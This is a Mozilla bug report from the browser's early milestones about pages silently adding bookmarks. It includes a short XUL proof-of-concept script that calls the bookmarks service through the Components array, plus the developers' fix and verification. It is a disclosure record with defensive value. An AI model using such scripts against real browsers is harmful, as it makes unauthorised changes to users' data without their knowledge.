Closed Bug 10120 Opened 25 years ago Closed 25 years ago

Adding bookmarks without user's knowledge

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

Tracking

()

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

()

Details

Mozilla 5.0 M8 Win95 (guess all platforms) allows adding bookmarks without user's knowledge. I do not think this is a good idea, it at least may be used as a DoS attack. The code is: -----------------bookm1.xul------------------------------------ <?xml version="1.0"?> <!DOCTYPE window> <window xmlns:html="http://www.w3.org/TR/REC-html40" xmlns:xul ="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul" title = "Adding bookmarks"> <html:script> <![CDATA[ function ab(url, title) { var bmks = Components.classes["component://netscape/browser/bookmarks-service"].getService( ); bmks = bmks.QueryInterface(Components.interfaces.nsIBookmarksService); bmks.AddBookmark(url, title); } ab('http://www.netscape.com','script #1'); ab('http://www.netscape.com','script #2'); ]]> </html:script> <html:h3> This page adds two bookmarks without user's knowledge. Look at your bookmarks. </html:h3> </window> ---------------------------------------------------------------
Status: NEW → ASSIGNED
This hole should be closed by restricting use of the Components array.
Target Milestone: M11
Blocks: 12633
Depends on: 7261
Component: Browser-General → Security
QA Contact: leger → dshea
Updating QA contact.
Currently mozilla prints "loaded successfully", but no text is displayed in the window.
I consider this bug fixed by restricting access to the Components array - it gives the error: "Access denied to XPConnect service" after replacing "<window" with "<xul:window" and "</window>" with "</xul:window>" in the demo.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
I've now checked in changes enabling XPConnect checks.
Status: RESOLVED → VERIFIED
QA Contact: dshea → junruh
Verified fixed.
Blocks: 7252
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
No longer depends on: 7261
You need to log in before you can comment on or make changes to this bug.